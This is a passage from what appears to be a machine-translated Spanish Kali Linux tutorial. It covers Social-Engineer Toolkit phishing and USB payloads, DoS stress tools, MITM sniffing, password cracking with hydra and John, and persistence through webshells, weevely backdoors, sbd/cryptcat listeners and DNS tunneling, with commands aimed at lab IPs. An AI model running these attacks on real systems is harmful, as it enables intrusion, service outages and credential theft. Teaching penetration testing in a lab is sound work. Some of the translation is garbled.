Paso 4 - Escriba "1" → Enter. Se abrirá un submenú. Si presiona
el botón Enter nuevamente, verá las explicaciones para cada submenú.
El módulo Spear-phishing le permite crear mensajes de correo electrónico
especialmente y enviarlos a sus víctimas específicas con cargas
útiles FileFormatmalicious adjuntas . Por ejemplo, enviar un documento PDF
malicioso que, si la víctima se abre, comprometerá el sistema. Si desea
falsificar su dirección de correo electrónico, asegúrese de que "Sendmail" esté
instalado (apt-get install sendmail) y cambie el indicador config / set_config
SENDMAIL = OFF a SENDMAIL = ON.
Hay dos opciones para el ataque de spear phishing:

 Realizar un ataque masivo de correo electrónico


 Crear una carga útil de FileFormat y una plantilla de ingeniería social
El primero es dejar que SET haga todo por usted (opción 1), el segundo es
crear su propia carga de FileFormat y usarla en su propio ataque.
Escriba "99" para volver al menú principal y luego escriba "2" para ir a "Los
vectores de ataque web".
El módulo de ataque web es una forma única de utilizar múltiples ataques
basados en web para comprometer a la víctima deseada. Este módulo se usa
al realizar ataques de phishing contra la víctima si hace clic en el enlace. Hay
una gran variedad de ataques que pueden ocurrir una vez que hacen clic en
un enlace.
Escriba "99" para volver al menú principal y luego escriba "3" .
El módulo infeccioso USB / CD / DVD creará un archivo autorun.inf y una
carga útil de Metasploit. La carga útil y el archivo de ejecución automática se
graban o copian en un USB. Cuando se inserta DVD / USB / CD en la
máquina de la víctima, activará una función de ejecución automática (si la
ejecución automática está habilitada) y con suerte comprometerá el
sistema. Puede elegir el vector de ataque que desea utilizar: errores de
formato de archivo o un ejecutable directo.
Las siguientes son las opciones para Infectious Media Generator.

 Exploits de formato de archivo


 Ejecutable estándar de Metasploit

Escriba "99" para volver al menú principal. Luego, escriba "4" para ir a "Los
vectores de ataque web".
Create payload and listener es una forma sencilla de crear una carga útil de
Metasploit. Exportará el archivo exe por usted y generará un oyente. Debería
convencer a la víctima para que descargue el archivo exe y lo ejecute para
obtener el shell.

Escriba "99" para volver al menú principal y luego escriba "5" para ir a "Los
vectores de ataque web".

El ataque masivo por correo le permitirá enviar múltiples correos electrónicos a


las víctimas y personalizar los mensajes. Hay dos opciones en el correo
electrónico masivo; el primero es enviar un correo electrónico a una sola
dirección de correo electrónico. La segunda opción le permite importar una
lista que tiene todos los correos electrónicos de los destinatarios y enviará su
mensaje a tantas personas como desee dentro de esa lista.

 Dirección de correo electrónico única de ataque de correo electrónico


 E-Mail Attack Mass Mailer
Escriba "99" para volver al menú principal y luego escriba "9" para ir a
"Powershell Attack Vector".

El módulo Powershell Attack Vector le permite crear ataques específicos de


PowerShell. Estos ataques le permiten usar PowerShell, que está disponible
de forma predeterminada en todos los sistemas operativos Windows Vista y
superiores. PowerShell proporciona un panorama fructífero para implementar
cargas útiles y realizar funciones que no se desencadenan mediante
tecnologías preventivas.

 Inyector alfanumérico de código de shell Powershell


 Powershell Reverse Shell
 Powershell Bind Shell
 Powershell Dump Base de datos SAM

Kali Linux - Herramientas de estrés


Las herramientas de estrés se utilizan para crear ataques DoS o para crear la
prueba de estrés para diferentes aplicaciones a fin de tomar las medidas
adecuadas para el futuro.
Todas las herramientas de prueba de estrés se encuentran en Aplicaciones →
Análisis de vulnerabilidad 02 → Prueba de estrés.
Todas las pruebas de estrés se realizarán en una máquina metsploitable que
tenga una IP de 192.168.1.102

Slowhttptest
Slowhttptest es una de las herramientas de ataque DoS. Utiliza especialmente
el protocolo HTTP para conectarse con el servidor y mantener ocupados los
recursos, como CPU y RAM. Veamos en detalle cómo usarlo y explicar sus
funciones.
Para abrir slowhttptest, primero abra la terminal y escriba "slowhttptest –
parameters" .
Puede escribir "slowhttptest –h" para ver todos los parámetros que necesita
usar. En caso de que reciba una salida, 'Comando no encontrado' primero
debe escribir "apt-get install slowhttptest" .
Luego, después de la instalación, vuelva a escribir slowhttptest –h

Escriba el siguiente comando:


slowhttptest -c 500 -H -g -o outputfile -i 10 -r 200 -t GET –
u
http://192.168.1.202/index.php -x 24 -p 2
Dónde,
 (-c 500) = 500 conexiones
 (-H) = modo Slowloris
 -g = Generar estadísticas
 -o outputfile = Nombre del archivo de salida
 -i 10 = Use 10 segundos para esperar los datos
 -r 200 = 200 conexiones con -t GET = solicitudes GET
 -u http://192.168.1.202/index.php = URL de destino
 -x 24 = máximo de longitud de 24 bytes
 -p 2 = tiempo de espera de 2 segundos

Una vez que comience la prueba, la salida será como se muestra en la


siguiente captura de pantalla, donde puede notar que el servicio está
disponible.
Después de un tiempo, en la conexión 287, el servicio deja de funcionar. Esto
significa que el servidor puede manejar un máximo de 287 conexiones HTTP.

Inviteflood
Inviteflood es un mensaje SIP / SDP INVITE que se inunda por UDP / IP. Se
ejecuta en una variedad de distribuciones de Linux. Realiza ataques DoS
(denegación de servicio) contra dispositivos SIP mediante el envío de
múltiples solicitudes INVITE.
Para abrir Inviteflood, primero abra la terminal y escriba "inviteflood –
parameters"
Para obtener ayuda, puede usar "inviteflood –h"

A continuación, puede usar el siguiente comando:


inviteflood eth0 target_extension target_domain target_ip
number_of_packets
Dónde,
 la extensión objetivo es 2000
 target_domain es 192.168.xx
 target_ip es 192.168.xx
 número_de_paquetes es 1
 -a es un alias de la cuenta SIP

Iaxflood
Iaxflood es una herramienta VoIP DoS. Para abrirlo, escriba "iaxflood
sourcename destinationname numpackets" en el terminal.
Para saber cómo usar, escriba "iaxflood –h"

thc-ssl-dos
THC-SSL-DOS es una herramienta para verificar el rendimiento de
SSL. Establecer una conexión SSL segura requiere 15 veces más potencia de
procesamiento en el servidor que en el cliente. THCSSL-DOS explota esta
propiedad asimétrica al sobrecargar el servidor y desconectarlo de Internet.
El siguiente es el comando:
thc-ssl-dos victimIP httpsport –accept
En este ejemplo, será -
thc-ssl-dos 192.168.1.1 443 –accept
Su salida sería la siguiente:
Kali Linux - Sniffing & Spoofing
El concepto básico de las herramientas de rastreo es tan simple como las
escuchas telefónicas y Kali Linux tiene algunas herramientas populares para
este propósito. En este capítulo, aprenderemos sobre las herramientas de
sniffing y spoofing disponibles en Kali.

Burpsuite
Burpsuite se puede utilizar como una herramienta de rastreo entre su
navegador y los servidores web para encontrar los parámetros que utiliza la
aplicación web.
Para abrir Burpsuite, vaya a Aplicaciones → Análisis de aplicaciones web →
burpsuite.
Para configurar el sniffing, configuramos burpsuite para que se comporte como
un proxy. Para hacer esto, vaya a Opciones como se muestra en la siguiente
captura de pantalla. Marque la casilla como se muestra.
En este caso, la IP del proxy será 127.0.0.1 con el puerto 8080.
Luego configure el proxy del navegador, que es la IP de la máquina burpsuite
y el puerto.
Para iniciar la intercepción, vaya a Proxy → Intercepción → haga clic en "La
intercepción está activada".
Continúe navegando en la página web en la que desea encontrar el parámetro
para probar vulnerabilidades.
En este caso, es una máquina metasploitable con IP 192.168.1.102

Vaya a "Historial HTTP". En la siguiente captura de pantalla, la línea marcada


con una flecha roja muestra la última solicitud. En Raw y el parámetro oculto
como la ID de sesión y otros parámetros como el nombre de usuario y la
contraseña se han subrayado en rojo.

mitmproxi
mitmproxy es un proxy HTTP man-in-the-middle con capacidad
SSL. Proporciona una interfaz de consola que permite que los flujos de tráfico
sean inspeccionados y editados sobre la marcha.
Para abrirlo, vaya a la terminal y escriba "mitmproxy -parameter" y para
obtener ayuda sobre los comandos, escriba "mitmproxy –h" .

Para iniciar el mitmproxy, escriba "mitmproxy –p portnumber" . En este


caso, es "mitmproxy –p 80".

Wireshark
Wireshark es uno de los mejores analizadores de paquetes de datos. Analiza
profundamente los paquetes a nivel de trama. Puede obtener más información
sobre Wireshark desde su página web oficial: https://www.wireshark.org/ . En
Kali, se encuentra utilizando la siguiente ruta: Aplicaciones → Sniffing &
Spoofing → wireshark.
Una vez que hace clic en wireshark, se abre la siguiente GUI.
Haga clic en "Inicio" y la captura de paquetes comenzará como se muestra en
la siguiente captura de pantalla.
sslstrip
sslstrip es un ataque MITM que obliga al navegador de una víctima a
comunicarse en texto plano a través de HTTP, y los proxies modifican el
contenido de un servidor HTTPS. Para hacer esto, sslstrip está "despojando"
https: // URLs y convirtiéndolos en http: // URLs.
Para abrirlo, vaya a Aplicaciones → 09-Sniffing & Spoofing → Spoofing and
MITM → sslstrip.
Para configurarlo, escriba para reenviar toda la comunicación de 80 puertos a
8080.

Luego, inicie el comando sslstrip para el puerto necesario.

Kali Linux - Herramientas para descifrar


contraseñas
En este capítulo, aprenderemos sobre las importantes herramientas para
descifrar contraseñas utilizadas en Kali Linux.

Hidra
Hydra es un cracker de inicio de sesión que admite muchos protocolos para
atacar (Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP (S) -FORM-
GET, HTTP (S) -FORM-POST, HTTP (S) -GET, HTTP (S) -HEAD, HTTP-
Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener,
Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin
, Rsh, SIP, SMB (NT), SMTP, SMTP Enum, SNMP v1 + v2 + v3, SOCKS5,
SSH (v1 y v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-
Auth, VNC y XMPP) .
Para abrirlo, vaya a Aplicaciones → Ataques de contraseña → Ataques en
línea → hydra.
Se abrirá la consola del terminal, como se muestra en la siguiente captura de
pantalla.

En este caso, aplicaremos el servicio FTP de fuerza bruta de la máquina


metasploitable, que tiene IP 192.168.1.101

Hemos creado en Kali una lista de palabras con la extensión 'lst' en la ruta usr
\ share \ wordlist \ metasploit .
El comando será el siguiente:
hydra -l /usr/share/wordlists/metasploit/user -P
/usr/share/wordlists/metasploit/ passwords
ftp://192.168.1.101 –V
donde –V es el nombre de usuario y la contraseña al intentar

Como se muestra en la siguiente captura de pantalla, se encuentran el nombre


de usuario y la contraseña que son msfadmin: msfadmin

Johnny
Johnny es una GUI para la herramienta para descifrar contraseñas de John
the Ripper. En general, se usa para contraseñas débiles.
Para abrirlo, vaya a Aplicaciones → Ataques de contraseña → johnny.
En este caso, obtendremos la contraseña de la máquina Kali con el siguiente
comando y se creará un archivo en el escritorio.

Haga clic en "Abrir archivo Passwd" → Aceptar y todos los archivos se


mostrarán como en la siguiente captura de pantalla.
Haga clic en "Iniciar ataque".

Una vez que el ataque se haya completado, haga clic en el panel izquierdo en
"Contraseñas" y la contraseña no aparecerá sombreada.
John
John es una versión de línea de comandos de Johnny GUI. Para iniciarlo,
abra la Terminal y escriba "john" .
En caso de que no se muestre la contraseña, debemos escribir el siguiente
comando:
root@kali:~# unshadow passwd shadow > unshadowed.txt

Rainbowcrack
El software RainbowCrack descifra los hash mediante la búsqueda en la tabla
del arco iris. Las tablas del arco iris son archivos ordinarios almacenados en el
disco duro. En general, las tablas Rainbow se compran en línea o se pueden
compilar con diferentes herramientas.
Para abrirlo, vaya a Aplicaciones → Ataques de contraseña → haga clic en
"rainbowcrack".

El comando para descifrar una contraseña hash es:


rcrack path_to_rainbow_tables -f path_to_password_hash

SQLdict
Es una herramienta de ataque de diccionario para el servidor SQL y es muy
fácil y básico de usar. Para abrirlo, abra la terminal y escriba "sqldict" . Se
abrirá la siguiente vista.
En "Servidor IP de destino", ingrese la IP del servidor que contiene el SQL. En
"Cuenta de destino", ingrese el nombre de usuario. Luego cargue el archivo
con la contraseña y haga clic en "Inicio" hasta que termine.

identificador hash
Es una herramienta que se utiliza para identificar tipos de hashes, es decir,
para qué se utilizan. Por ejemplo, si tengo un HASH, puede decirme si es un
HASH de Linux o Windows.
La pantalla anterior muestra que puede ser un hash MD5 y parece una
credencial en caché de dominio.

Kali Linux: mantenimiento del acceso


En este capítulo, veremos las herramientas que Kali usa para mantener la
conexión y acceder a una máquina pirateada, incluso cuando se conecta y
desconecta de nuevo.

Powersploit
Esta es una herramienta que es para máquinas Windows. Tiene instalado
PowerShell en la máquina de víctimas. Esta herramienta ayuda al pirata
informático a conectarse con la máquina de la víctima a través de PowerShell.
Para abrirlo, abra el terminal a la izquierda y escriba el siguiente comando
para ingresar a la carpeta powersploit:
cd /usr/share/powersploit/
Si escribe "ls" , enumerará todas las herramientas de PowerSploit que puede
descargar e instalar en la máquina de la víctima después de que haya
obtenido acceso. La mayoría de ellos se explican por sí mismos según sus
nombres.
Una manera fácil de descargar esta herramienta en la máquina de la víctima
es crear un servidor web, que las herramientas powersploit permiten crear
fácilmente usando el siguiente comando:
python -m SimpleHTTPServer

Después de esto, si escribe: http: // <dirección_ip de la máquina Kali>: 8000 /


following es el resultado.

Sbd
sbd es una herramienta similar a Netcat. Es portátil y se puede usar en
máquinas Linux y Microsoft. sbd presenta el cifrado AES-CBC-128 + HMAC-
SHA1> Básicamente, ayuda a conectarse a la máquina de la víctima en
cualquier momento en un puerto específico y enviar comandos de forma
remota.
Para abrirlo, vaya a la terminal y escriba "sbd -l -p port" para que el servidor
acepte las conexiones.
En este caso, pongamos el puerto 44 donde escuchará el servidor.

En el sitio de la víctima, escriba "sbd IPofserver port" . Se establecerá una


conexión donde podremos enviar los comandos remotos.
En este caso, es "localhost" ya que hemos realizado la prueba en la misma
máquina.

Finalmente, en el servidor verá que se ha producido una conexión como se


muestra en la siguiente captura de pantalla.

Webshells
Las webshells pueden usarse para mantener el acceso o para hackear un sitio
web. Pero la mayoría de ellos son detectados por los antivirus. El C99 php
shell es muy conocido entre los antivirus. Cualquier antivirus común lo
detectará fácilmente como un malware.
En general, su función principal es enviar comandos del sistema a través de
interfaces web.
Para abrirlo, escriba "cd / usr / share / webshells /" en el terminal.
Como puede ver, se dividen en clases según el lenguaje de programación:
asp, aspx, cfm, jsp, perl, php
Si ingresa en la carpeta PHP, puede ver todas las webshells para páginas web
php.

Para cargar el shell en un servidor web, por ejemplo, "simple-


backdoor.php", abra la página web y la URL del shell web.
Al final, escriba el comando cmd. Tendrá toda la información que se muestra
en la siguiente captura de pantalla.

Semanal
Weevely es un shell web PHP que simula conexiones tipo telnet. Es una
herramienta para la explotación posterior a la aplicación web, y se puede usar
como una puerta trasera oculta o como un shell web para administrar cuentas
web legítimas, incluso las alojadas gratuitamente.
Para abrirlo, vaya a la terminal y escriba "weevely" donde puede ver su uso.
Para generar el shell, escriba "weevely generate password
pathoffile" . Como se ve en la siguiente captura de pantalla, se genera en la
carpeta "Escritorio" y el archivo debe cargarse en un servidor web para
obtener acceso.

Después de cargar el shell web como se muestra en la siguiente captura de


pantalla, podemos conectarnos con cmd al servidor usando el
comando "contraseña de URL semanal" donde puede ver que una sesión ha
comenzado.
túnel http
http-tunnel crea un flujo de datos virtual bidireccional tunelizado en solicitudes
HTTP. Las solicitudes se pueden enviar a través de un proxy HTTP si así se
desea. Esto puede ser útil para usuarios detrás de firewalls restrictivos. Si se
permite el acceso WWW a través de un proxy HTTP, es posible usar el túnel
http y telnet o PPP para conectarse a una computadora fuera del firewall.
Primero, debemos crear un servidor de túnel con el siguiente comando:
httptunnel_server –h
Luego, en el sitio del cliente, escriba "httptunnel_client –h" y ambos
comenzarán a aceptar conexiones.

dns2tcp
Esta es nuevamente una herramienta de túnel que ayuda a pasar el tráfico
TCP a través del tráfico DNS, lo que significa el puerto UDP 53.
Para iniciarlo, escriba "dns2tcpd" . El uso se explica cuando abrirá el script.

En el sitio del servidor, ingrese este comando para configurar el archivo.


#cat >>.dns2tcpdrc
<&l;END listen = 0.0.0.0
port = 53 user=nobody
chroot = /root/dns2tcp
pid_file = /var/run/dns2tcp.pid
domain = your domain key = secretkey
resources = ssh:127.0.0.1:22
END
#dns2tcpd -f .dns2tcpdrc
En el sitio del Cliente, ingrese este comando.
# cat >>.dns2tcprc
<<END domain = your domain
resource = ssh
local_port = 7891
key = secretkey
END
# dns2tcpc -f .dns2tcprc
# ssh root@localhost -p 7891 -D 7076
La tunelización comenzará con este comando.

cryptcat
Es otra herramienta como Netcat que permite realizar conexiones TCP y UDP
con la máquina de la víctima de forma encriptada.
Para iniciar un servidor para escuchar una conexión, escriba el siguiente
comando:
cryptcat –l –p port –n

Dónde,
 -l significa escuchar una conexión
 -p significa parámetro de número de puerto
 -n significa no hacer la resolución de nombre
En el sitio del cliente, el comando de conexión es "cryptcat IPofServer
PortofServer"

Kali Linux - Ingeniería inversa


En este capítulo, aprenderemos sobre las herramientas de ingeniería inversa
de Kali Linux.

OllyDbg
OllyDbg es un depurador de análisis de nivel de ensamblador de 32 bits para
aplicaciones de Microsoft Windows. El énfasis en el análisis de código binario
lo hace particularmente útil en casos donde la fuente no está disponible. En
general, se utiliza para descifrar los softwares comerciales.
Para abrirlo, vaya a Aplicaciones → Ingeniería inversa → ollydbg

Para cargar un archivo EXE, vaya a la "Carpeta de apertura" en color amarillo,


que se muestra en un cuadrado rojo en la captura de pantalla anterior.
Después de cargar, tendrá la siguiente vista donde puede cambiar los archivos
binarios.
dex2jar
Esta es una aplicación que ayuda a convertir el archivo APK (Android) en un
archivo JAR para ver el código fuente. Para usarlo, abra el terminal y
escriba "d2j-dex2jar –d / file location" .
En este caso, el archivo es "classes.dex" en el escritorio.

La siguiente línea muestra que se ha creado un archivo JAR.


jd-gui
JD-GUI es una utilidad gráfica independiente que muestra los códigos fuente
Java de los archivos ".class" . Puede navegar por el código fuente
reconstruido. En este caso, podemos reconstruir el archivo que extrajimos de
la herramienta dex2jar.
Para iniciarlo, abra el terminal y escriba "jd-gui" y se abrirá la siguiente vista.

Para importar el archivo, haga clic en el icono de la carpeta abierta en la


esquina superior izquierda y luego importe el archivo.
apktool
Apktool es una de las mejores herramientas para revertir toda la aplicación de
Android. Puede decodificar recursos en una forma casi original y reconstruirlos
después de realizar modificaciones.
Para abrirlo, vaya a la terminal y escriba "apktool" .
Para descompilar un archivo apk, escriba " archivo apktool d apk" .

La descompilación comenzará como se muestra en la siguiente captura de


pantalla.

Kali Linux - Herramientas de informes


En este capítulo, aprenderemos sobre algunas herramientas de informes en
Kali Linux.
Dradis
En todo este trabajo que hemos realizado, es importante compartir los
resultados producidos, realizar un seguimiento de nuestro trabajo, etc. Para
este propósito, Kali tiene una herramienta de informes llamada dradis, que es
un servicio web.
Paso 1 : para iniciar Dradis, escriba "service dradis start" .

Paso 2 : para abrir, vaya a Aplicaciones → Herramientas de informes →


dradis.

Se abrirá la URL web. Cualquiera en LAN puede abrirlo en la siguiente


URL https: // IP de la máquina kali: 3004
Inicie sesión con el nombre de usuario y la contraseña que utilizó por primera
vez.
Paso 3 : después de iniciar sesión, puede importar archivos desde NMAP,
NESSUS, NEXPOSE. Para hacerlo, vaya a "Importar desde archivo" → haga
clic en "nuevo importador (con comentarios en tiempo real)".

Paso 4 : selecciona el tipo de archivo que deseas cargar. En este caso, es


"Nessus scan" → haga clic en "Examinar".
Si va a la página de inicio ahora, en el panel izquierdo verá que los escaneos
importados están en una carpeta con sus detalles de host y puerto.

Metagoofil
Metagoofil realiza una búsqueda en Google para identificar y descargar los
documentos en el disco local y luego extrae los metadatos. Extrae metadatos
de documentos públicos pertenecientes a una empresa específica, individuo,
objeto, etc.
Para abrirlo, vaya a: "usr / share / metagoofil /" .

Para comenzar a buscar, escriba el siguiente comando:


python metagoofil.py
Puede usar los siguientes parámetros con este comando:
 –D (nombre de dominio)
 –T (tipo de archivo para descargar dox, pdf, etc.)
 –L (limitar los resultados 10, 100)
 –N (limite los archivos para descargar)
 –O (ubicación para guardar los archivos)
 –F (archivo de salida)
El siguiente ejemplo muestra que solo el nombre de dominio está oculto.

Вам также может понравиться